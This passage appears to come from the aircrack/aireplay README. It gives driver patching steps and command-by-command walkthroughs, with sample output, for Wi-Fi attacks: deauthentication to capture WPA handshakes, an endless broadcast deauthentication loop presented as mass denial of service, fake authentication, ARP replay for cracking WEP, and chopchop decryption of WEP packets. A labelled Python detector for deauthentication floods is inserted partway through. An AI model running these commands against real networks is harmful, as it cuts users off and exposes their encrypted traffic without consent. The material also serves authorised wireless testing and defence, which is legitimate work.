wget http://100h.org/wlan/linux/patches/wlanng-0.2.1-pre26.patch
tar -xvzf wlanng-0.2.1-pre26.tar.gz
cd wlanng-0.2.1-pre26
patch -Np1 -i ../wlanng-0.2.1-pre26.patch
make config && make all && make install
mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
/etc/init.d/pcmcia start
modprobe prism2_pci &>/dev/null
+ Installing the r8180-sa2400 driver (RTL8180 cards)
ifconfig wlan0 down
rmmod r8180
cd /usr/src
wget http://100h.org/wlan/linux/rtl8180/rtl8180-0.21.tar.gz
wget http://100h.org/wlan/linux/patches/rtl8180-0.21.patch
tar -xvzf rtl8180-0.21.tar.gz
cd rtl8180-0.21
patch -Np1 -i ../rtl8180-0.21.patch
make && make install
depmod -a
modprobe r8180
+ Installing the rt2500 driver (Ralink b/g PCI/PCMCIA)
ifconfig ra0 down
rmmod rt2500
cd /usr/src
wget http://100h.org/wlan/linux/ralink/rt2500-cvs-20050826.tgz
tar -xvzf rt2500-cvs-20050826.tgz
cd rt2500-cvs-20050826
cd Module
make && make install
modprobe rt2500
Make sure to load the driver with modprobe (not insmod) and to put the
card in Monitor mode before bringing the interface up.
+ Installing the rt2570 driver (Ralink b/g USB)
ifconfig rausb0 down
rmmod rt2570
cd /usr/src
wget http://100h.org/wlan/linux/ralink/rt2570-cvs-20050826.tgz
wget http://100h.org/wlan/linux/patches/rt2570-cvs-20050824.patch
tar -xvzf rt2570-cvs-20050826.tgz
cd rt2570-cvs-20050826
patch -Np1 -i ../rt2570-cvs-20050824.patch
cd Module
make && make install
modprobe rt2570
The driver won't compile.
This usually happens because the Linux kernel headers don't match your
currently running kernel. In this situation, recompile a fresh kernel,
install it and reboot. Then try compiling the driver again.
See this HOWTO for more details about kernel compilation.
How do I use aireplay?
If the driver was properly patched, aireplay is able to inject raw 802.11
packets in Monitor mode; it currently implements a set of five different
attacks.
If you get "ioctl(SIOCGIFINDEX) failed: No such device", double check that
your device name is correct and that you haven't forgotten a parameter on
the command line.
In the following examples, 00:13:10:30:24:9C is the MAC address of the
access point (on channel 6), and 00:09:5B:EB:C5:2B is the MAC address of a
wireless client.
+ Attack 0: deauthentication
This attack is mostly useful to recover a hidden (not broadcast) ESSID
and to capture WPA handshakes by forcing clients to reauthenticate. It
can also be used to generate ARP requests, since Windows clients
sometimes flush their ARP cache when disconnected. Of course, this
attack is totally useless if there are no associated wireless clients.
It is usually more effective to target a specific station using the -c
parameter.
Some examples:
o WPA Handshake capture with an Atheros
airmon.sh start ath0
airodump ath0 out 6 (switch to another console)
aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0
(wait for a few seconds)
aircrack -w /path/to/dictionary out.cap
o ARP request generation with a Prism2 card
airmon.sh start wlan0
airodump wlan0 out 6 (switch to another console)
aireplay -0 5 -a 00:13:10:30:24:9C wlan0
aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
After sending the five batches of deauthentication packets, we
start listening for ARP requests with attack 3. The -h option is
mandatory and has to be the MAC address of an associated client.
If the driver is wlan-ng, you must run the airmon.sh script;
otherwise the card won't be correctly set up for injection.
o Mass denial-of-service with a RT2500 card
airmon.sh start ra0
aireplay -0 0 -a 00:13:10:30:24:9C ra0
With parameter 0, this attack will loop forever sending
deauthentication packets to the broadcast address, thus preventing
clients from staying connected.
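From the monitoring side, the loop above shows up as a burst of deauthentication frames addressed to the broadcast address from one BSSID. The following is an added example, not code from the aircrack README or project: a small Python detector that parses constructed raw 802.11 management frame headers and flags a BSSID that reaches an assumed threshold of broadcast deauthentication frames. The MAC addresses are the ones used in this README's examples; the frames themselves are built inline as test data.

```python
# Added example, not from the aircrack README: a small detector for the
# broadcast deauthentication flood of attack 0, run over constructed
# raw 802.11 management frames (MAC addresses are the README's examples).
import struct
from collections import Counter

DEAUTH_THRESHOLD = 5   # assumed alert threshold; tune per environment
BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def mac_bytes(s):
    return bytes.fromhex(s.replace(":", ""))

def build_mgmt_frame(subtype, dst, src, bssid, reason=None):
    """Constructed test frame: frame control (type 0 = management),
    duration, addr1 (DA), addr2 (SA), addr3 (BSSID), sequence control,
    plus a 2-byte reason code for deauthentication frames."""
    fc = bytes([(0 << 2) | (subtype << 4), 0])
    hdr = fc + b"\x00\x00" + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid) + b"\x00\x00"
    return hdr + (struct.pack("<H", reason) if reason is not None else b"")

def parse_frame(frame):
    """Return (type, subtype, dst, src, bssid) from a raw 802.11 header."""
    fc0 = frame[0]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    return ftype, subtype, mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22])

def detect_deauth_flood(frames, threshold=DEAUTH_THRESHOLD):
    """Count broadcast deauthentication frames (subtype 12) per BSSID
    and return the BSSIDs that reach the threshold."""
    counts = Counter()
    for f in frames:
        ftype, subtype, dst, _src, bssid = parse_frame(f)
        if ftype == 0 and subtype == 12 and dst == BROADCAST:
            counts[bssid] += 1
    return {b: n for b, n in counts.items() if n >= threshold}

AP = "00:13:10:30:24:9c"
STA = "00:09:5b:eb:c5:2b"
# Constructed capture: a beacon, one legitimate unicast deauth, then the
# broadcast deauth burst that "aireplay -0 0 -a <AP>" would produce.
SAMPLE = [build_mgmt_frame(8, BROADCAST, AP, AP),
          build_mgmt_frame(12, STA, AP, AP, reason=3)] + \
         [build_mgmt_frame(12, BROADCAST, AP, AP, reason=7) for _ in range(6)]

if __name__ == "__main__":
    print(detect_deauth_flood(SAMPLE))   # {'00:13:10:30:24:9c': 6}
```

A single unicast deauthentication is normal AP behaviour and is deliberately not counted; only the broadcast burst trips the threshold.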
+ Attack 1: fake authentication
This attack is particularly useful when there are no associated
clients: we create a fake client MAC address which will be registered
in the AP's association table. This address will then be used for
attacks 3 (ARP request reinjection) and 4 ("chopchop" WEP decryption).
However, if this attack fails and there is already an associated client,
it's more reliable to just use that client's MAC address (here,
00:09:5B:EB:C5:2B) in attacks 3 and 4.
aireplay -1 0 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful :-)
+---------------------------------------------------------------------+
| With patched madwifi CVS 2005-08-14, it's possible to inject        |
| packets while in Managed mode (the WEP key itself doesn't matter,   |
| as long as the AP accepts Open-System authentication). So, instead  |
| of running attack 1, you may just associate and inject / monitor    |
| through the athXraw interface:                                      |
|                                                                     |
| ifconfig ath0 down hw ether 00:10:20:30:40:50                       |
| iwconfig ath0 mode Managed essid myap key AAAAAAAAAA                |
| ifconfig ath0 up                                                    |
|                                                                     |
| sysctl -w dev.ath0.rawdev=1                                         |
| ifconfig ath0raw up                                                 |
| airodump ath0raw out 6                                              |
|                                                                     |
| Then you can run attack 3 or 4 (aireplay will automatically replace |
| ath0 with ath0raw below):                                           |
|                                                                     |
| aireplay -3 -h 00:10:20:30:40:50 -b 00:13:10:30:24:9C ath0          |
| aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0                          |
|                                                                     |
+---------------------------------------------------------------------+
Some access points require the client to reassociate every 30 seconds;
otherwise our fake client is considered disconnected. In this case, set
the periodic re-association delay:
aireplay -1 30 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
If this attack seems to fail (aireplay keeps sending authentication
requests), MAC address filtering may be in place. Also make sure that:
o You are close enough to the access point.
o The driver is properly patched and installed.
o The card is configured on the same channel as the AP.
o The BSSID and ESSID (-a / -e options) are correct.
o If Prism2, make sure the firmware was updated.
As a reminder: you can't inject with a Centrino, Hermes, ACX1xx,
Aironet, Marvell or Broadcom chipset because of firmware and/or driver
limitations.
+ Attack 2: interactive packet replay
This attack is mostly useless and is present for debugging purposes
only. You could use it, for example, to replay "ToDS" packets coming
from a wireless client; but in any case, attack 3 (ARP reinjection) is
more effective.
aireplay -2 -f 0 -t 1 -d FF:FF:FF:FF:FF:FF -n 90 ath0
+ Attack 3: ARP-request reinjection
The classic ARP-request replay attack is the most effective way to
generate new IVs, and works very reliably. You need either the MAC
address of an associated client (00:09:5B:EB:C5:2B) or a fake MAC from
attack 1 (0:1:2:3:4:5). You may have to wait a couple of minutes, or
even longer, until an ARP request shows up; this attack will fail if
there is no traffic.
Please note that you can also reuse ARP requests from a previous
capture using the -r switch.
aireplay -3 -b 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...
+ Attack 4: KoreK's "chopchop" (CRC prediction)
This attack, when successful, can decrypt a WEP data packet without
knowing the key. It can even work against dynamic WEP. This attack does
not recover the WEP key itself, but merely reveals the plaintext.
However, most access points are not vulnerable at all. Some may seem
vulnerable at first but actually drop data packets shorter than 60
bytes. This attack requires at least one WEP data packet.
1. First, we decrypt one packet:
aireplay -4 -h 00:09:5B:EB:C5:2B ath0
2. Let's have a look at the IP address:
tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
3. Then, forge an ARP request.
The source IP (192.168.1.100) doesn't matter, but the destination
IP (192.168.1.2) must respond to ARP requests. The source MAC must
belong to an associated station.
./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \
00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap
4. And replay our forged ARP request:
aireplay -2 -r arp.cap ath0
-------------------------------------------------------------------------------
Finally, I'd like to thank all the many, many people who contributed to
aircrack... you know who you are :-)
-------------------------------------------------------------------------------